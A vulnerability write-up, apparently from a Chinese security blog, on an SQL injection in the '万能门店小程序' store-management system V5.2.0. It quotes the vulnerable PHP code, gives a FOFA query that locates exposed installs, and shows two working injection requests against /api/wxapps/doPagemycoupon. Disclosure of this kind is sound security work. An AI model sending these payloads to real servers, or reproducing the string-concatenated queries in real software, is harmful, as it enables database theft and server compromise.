万能门店小程序管理系统 /api/wxapps/doPagemycoupon SQL 注入漏洞


漏洞简介

万能门店小程序管理系统是一款功能强大的工具,旨在为各行业商家提供线上线下融合的全方位解决方案。是一个集成了会员管理和会员营销两大核心功能的综合性平台。它支持多行业使用,通过后台一键切换版本,满足不同行业商家的个性化需求。该系统采用轻量后台,搭载高效服务器,确保小程序运行流畅,提升用户体验。万能门店小程序管理系统 /api/wxapps/doPagemycoupon 存在 SQL 注入漏洞,攻击者可通过该漏洞获取数据库中的敏感信息,甚至可能进一步控制服务器。

影响版本

万能门店小程序全开源独立版V5.2.0

fofa语法

body="/new_plat/index.html#/login" || (body="/comhome/cases/index.html" && body="/Comhome/functionshow/index.html")

漏洞分析

application/api/controller/Wxapps.php

public function doPagemycoupon()
    {
        $uniacid = input('uniacid');
        $suid = input('suid');
        $flag = input('flag');
        $tiaojian = " and flag <> 2 and flag = 0";
        if ($flag == 0) {
            $tiaojian = " and flag <> 2 and flag = 0";
        }
        if ($flag == 1) {
            $tiaojian = " ";
        }

        //if ($suid) {
        //$user = Db::name('wd_xcx_user')->where("uniacid", $uniacid)->where("openid", $openid)->find();
        //}
        //$suid = $user['id'];
        $prefix = config('database.prefix');
        $yhqsold = Db::query("select * from {$prefix}wd_xcx_coupon_user where uniacid = " . $uniacid . " and suid = " . $suid . $tiaojian . " ORDER BY id desc");
        $time = time();
        $aa = [];
        foreach ($yhqsold as $key => &$resi) {
            if ($resi['etime'] != 0) {
                if ($time > $resi['etime'] && $resi['flag'] == 0) {
                    $kdata = array(
                        "flag" => 2
                    );
                    Db::name('wd_xcx_coupon_user')->where("id", $resi['id'])->update($kdata);
                }
            }
        }
        // 重新获取过滤后的我的优惠券
        $prefix = config('database.prefix');
        $yhqs = Db::query("select * from {$prefix}wd_xcx_coupon_user where uniacid = " . $uniacid . " and suid = " . $suid . $tiaojian . " ORDER BY flag asc, id desc");
        $type = input("type");

        foreach ($yhqs as $key => &$res) {

两处 Db::query sql语句里的 $uniacid 和 $suid 均来自用户可控的参数,因此造成SQL注入漏洞。

漏洞复现

POST /api/wxapps/doPagemycoupon HTTP/1.1
Host: wxapps.mrxn.net
Content-Type: application/x-www-form-urlencoded

uniacid=1+AND+GTID_SUBSET(CONCAT((SELECT(md5(123456)))),3119)--&suid=1

POST /api/wxapps/doPagemycoupon HTTP/1.1
Host: wxapps.mrxn.net
Content-Type: application/x-www-form-urlencoded

suid=1+AND+GTID_SUBSET(CONCAT((SELECT(md5(123456)))),3119)+and+1=1&uniacid=1

手机扫码阅读

万能门店小程序管理系统 /api/wxapps/doPageindexCop SQL 注入漏洞

万能门店小程序管理系统 /api/wxapps/dopagefxszhongx SQL 注入漏洞

评 论